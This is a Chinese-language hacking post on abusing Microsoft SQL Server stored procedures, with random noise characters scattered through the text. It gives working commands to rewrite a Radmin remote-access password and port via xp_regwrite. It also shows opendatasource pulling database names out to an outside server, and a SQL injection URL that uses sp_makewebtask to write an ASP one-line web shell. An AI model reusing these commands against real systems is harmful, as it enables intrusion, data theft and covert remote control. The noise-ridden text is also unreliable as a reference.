! G$ n. m% L2 o% a6 D6 }( G, t bdbo.xp_makecab3 q9 Q; Y* w2 \5 S. b2 }
9 r# h' A+ {( N9 Z% j2 {# q! ]# Z将目标多个档案压缩到某个目标档案之内。! K) ?* ~: x' ^+ h8 x. }: I
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。 6 v9 l: M2 Q6 S8 M3 T 8 B* s* n y+ t' w5 |$ zdbo.xp_makecab A1 j! ]/ x' ^' K( [# w7 T
'c:\test.cab','mszip',1,5 l) O! P4 g) h6 P8 Z; r1 o) e
'C:\Inetpub\wwwroot\SQLInject\login.asp',: i5 U* f+ x8 g0 t+ R# t. a
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp' ; A( d. }4 a1 b+ D8 w9 i' ?, z% U1 }0 G2 Q( n$ Z% e0 T
xp_terminate_process k$ r' g4 \( P" ^7 w. A( [
: _; V1 z. k% p6 V& n& _停掉某个执行中的程序,但赋予的参数是 Process ID。: i8 y0 y, H1 L4 K) I
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID 7 A9 m4 J- z; z* u' g : }3 m6 \3 _8 T [xp_terminate_process 2484 / `5 l- o3 v+ H- e d+ K% f9 I2 D8 }& V! lxp_unpackcab ! w' b4 A- ] k- b% d# W% L) F/ a3 Y3 s3 @
解开压缩档。9 A: t; a H3 P# T1 S- t, e/ e: \
8 z; [- d9 s! O _* M9 E, v- [
xp_unpackcab 'c:\test.cab','c:\temp',1+ W( @/ W/ K0 X E6 y6 i: _1 o3 `
: a% y# m0 C3 E H7 P $ b/ c j% Y& ^+ O1 M9 u8 x) {某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234 - `4 Z: t/ ?0 i8 v" f0 G: B! w+ F( P0 E9 W
create database lcx; ' g, j K) q/ n3 l. UCreate TABLE ku(name nvarchar(256) null); & m2 A1 J5 |/ [( h Y4 s6 C0 R4 O4 {9 bCreate TABLE biao(id int NULL,name nvarchar(256) null); , X+ J4 v/ w8 @) i6 j/ z. N2 a) @/ |1 U$ B( _% I
//得到数据库名- s7 B, ?4 ~6 b! M) z( ^5 k4 P
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases( T( P$ O8 r+ {. C8 m, m
9 J# w. k4 Z2 O5 N- ]7 k
1 T& ^4 y' \& k& m2 J; \
//在Master中创建表,看看权限怎样 1 R& w8 U. F: R1 I5 |: B+ \ r1 _8 c& n: i4 pCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- " {; r. X+ E2 [* q5 D: w& r5 t9 S 0 J. ]) l+ s; w: a4 y/ A- G, F- s用 sp_makewebtask直接在web目录里写入一句话马:+ B- K3 z5 t. }+ a http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--- e U1 a( o7 H# h3 X4 S8 O
+ [, `( o5 q' t: p6 w//更新表内容( w. P! a' t" z; A
Update films SET kind = 'Dramatic' Where id = 123 + f5 j7 Q: g) h4 |0 C0 n5 L O 3 i- T# L: M. {$ o- M4 E//删除内容) k2 e# |# D/ t1 C% |
delete from table_name where Stockid = 3